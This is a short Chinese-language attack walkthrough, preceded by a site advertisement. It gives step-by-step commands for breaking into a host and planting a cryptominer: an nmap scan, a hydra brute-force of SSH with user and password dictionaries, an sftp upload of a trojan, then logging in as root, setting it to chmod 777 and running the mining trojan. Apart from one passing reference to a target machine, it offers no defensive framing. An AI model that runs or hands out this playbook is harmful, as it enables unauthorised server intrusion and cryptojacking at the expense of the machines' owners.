NIUCLOUD是一款SaaS管理后台框架多应用插件+云编译。上千名开发者、服务商正在积极拥抱开发者生态。欢迎开发者们免费入驻。一起助力发展! 广告
[TOC] ## 攻击步骤 ### 1、信息收集 * 使用nmap命令对目标主机进行扫描。 ``` nmap -T4 -sT 目标IP地址 ``` ### 2、爆破SSH ``` hydra -L 用户字典 -P 密码字典 ssh://目标IP ``` ### 3、sftp连接目标 * 由于SSH和sftp通用一个端口 ``` sftp root@目标IP ``` ### 4、上传木马 ``` put 本机木马文件 目标目录 ``` ### 5、执行挖矿木马 * 登录 ``` ssh root@靶机ip ``` * 赋予权限 ``` chmod 777 挖矿木马文件 ``` * 执行木马文件 ``` ./木马文件 ```